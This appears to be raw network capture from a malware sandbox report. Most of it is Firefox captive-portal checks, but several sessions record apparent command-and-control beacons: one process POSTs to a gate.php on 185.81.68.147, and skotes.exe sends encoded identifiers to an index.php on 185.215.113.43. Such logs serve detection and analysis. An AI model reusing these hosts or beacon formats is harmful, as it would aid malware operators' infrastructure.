                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.794639111 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.113847971 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75285
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.859216928 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:52.173892021 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75294
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:53.392733097 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:53.707391977 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75295
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:03.782874107 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:05.174751997 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:05.489336967 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75307
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:10.307329893 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:10.621658087 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75312
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        115192.168.2.105021934.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:24.666887999 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        116192.168.2.1050221185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:24.758658886 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:24.882642031 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.257503033 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:25 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        117192.168.2.105022734.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:25.516558886 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        118192.168.2.105023134.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.423924923 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        119192.168.2.1050233185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.505068064 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.627265930 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.945735931 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:27 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        120192.168.2.1050232185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.536042929 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.819387913 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:27 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        121192.168.2.105023634.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.840504885 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        122192.168.2.105023734.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.390544891 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        123192.168.2.105024234.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.170372009 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:29.261311054 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 04:09:04 GMT
                                                                                                                                                                                                                                                                                        Age: 42085
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:29.329361916 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:29.648333073 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 04:09:04 GMT
                                                                                                                                                                                                                                                                                        Age: 42085
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:32.730245113 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:33.047941923 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 04:09:04 GMT
                                                                                                                                                                                                                                                                                        Age: 42088
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.204361916 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.163570881 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.483501911 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 04:09:04 GMT
                                                                                                                                                                                                                                                                                        Age: 42100
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:52.183986902 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:52.509226084 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 04:09:04 GMT
                                                                                                                                                                                                                                                                                        Age: 42108
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:53.745369911 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:54.063251972 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 04:09:04 GMT
                                                                                                                                                                                                                                                                                        Age: 42109
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:04.143476009 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:05.633491993 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:05.949968100 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 04:09:04 GMT
                                                                                                                                                                                                                                                                                        Age: 42121
